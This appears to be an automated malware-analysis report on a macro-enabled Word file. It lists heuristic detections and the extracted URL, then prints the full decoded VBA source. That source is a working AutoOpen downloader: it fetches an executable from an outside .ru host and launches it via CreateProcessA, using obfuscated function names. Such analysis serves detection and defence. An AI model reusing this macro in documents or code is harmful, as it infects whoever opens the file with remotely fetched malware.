MALICIOUS
90
Risk Score
Heuristics 4
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
"URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Public Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://p0t6.jumevty.ru/972449655.exeSystemComponentModelEventHandlerListL Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3791 bytes |
SHA-256: e198236fce5a8c41b86fec05d4e6ab2a5fcd0f36a5b47a00ab9c36ab0e25b0cc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private Declare Function SystemRuntimeInteropServicesWindowsRuntimeICommandAdapterHelperscDisplayClassU Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function SystemSecurityCryptographyCAPIBaseCMSGRECIPIENTENCRYPTEDKEYINFOB Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As SystemDataOleDbOleDbPropertyInfoD, lpProcessInformation As SystemComponentModelInitializationEventAttributen) As Long
Private Declare Sub MicrosoftSqlServerServerSmiParameterMetaDataU Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As SystemDataOleDbOleDbPropertyInfoD)
Option Explicit
Private Type SystemComponentModelInitializationEventAttributen
hProcess As Long
dwProcessId As Long
dwThreadId As Long
hThread As Long
End Type
Private Type SystemDataOleDbOleDbPropertyInfoD
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
hStdOutput As Long
hStdError As Long
cb As Long
lpReserved As Long
lpReserved2 As Byte
hStdInput As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwY As Long
dwXSize As Long
hStdOutput As Long
hStdError As Long
cb As Long
lpReserved As Long
End Type
Private Const SW_SHOWNORMAL As Long = 1
Private si As SystemDataOleDbOleDbPropertyInfoD
Private pi As SystemComponentModelInitializationEventAttributen
Dim ret
Dim das
Dim sas
Public Sub AutoOpen()
ret = 41
das = Replace("SystemComponentModelEventHandlerListLhttps://p0t6.jumevty.ru/972449655.exeSystemComponentModelEventHandlerListL", "SystemComponentModelEventHandlerListL", "")
sas = Replace("mNetTransportTypeOSystemDataExpressionParserW.emNetTransportTypeOxe", "mNetTransportTypeO", "")
ret = 43
ret = SystemRuntimeInteropServicesWindowsRuntimeICommandAdapterHelperscDisplayClassU(0, das, sas, 0, 0)
SystemNetUploadValuesCompletedEventHandlerx (sas)
End Sub
Public Function SystemNetUploadValuesCompletedEventHandlerx(Filename As String, Optional CommandLine As String)
Const STARTF_USESHOWWINDOW As Long = 1
Const NORMAL_PRIORITY_CLASS As Long = &H20
Dim n As Long
Dim lr As Long
Dim CmdLine As String
Dim argc As Long
Dim argv() As String
CmdLine = """" & Filename & """"
si.cb = Len(si)
MicrosoftSqlServerServerSmiParameterMetaDataU si
si.dwFlags = STARTF_USESHOWWINDOW
si.wShowWindow = SW_SHOWNORMAL
lr = SystemSecurityCryptographyCAPIBaseCMSGRECIPIENTENCRYPTEDKEYINFOB(vbNullString, _
CmdLine, _
ByVal 0, _
ByVal 0, _
False, _
NORMAL_PRIORITY_CLASS, _
ByVal 0, _
vbNullString, _
si, _
pi)
SystemNetUploadValuesCompletedEventHandlerx = lr
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes |
SHA-256: 3f79b5ca66ba4f7e1e447bd07b64ceaec7335bff4ec8e567aabd27be6bc58bec |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.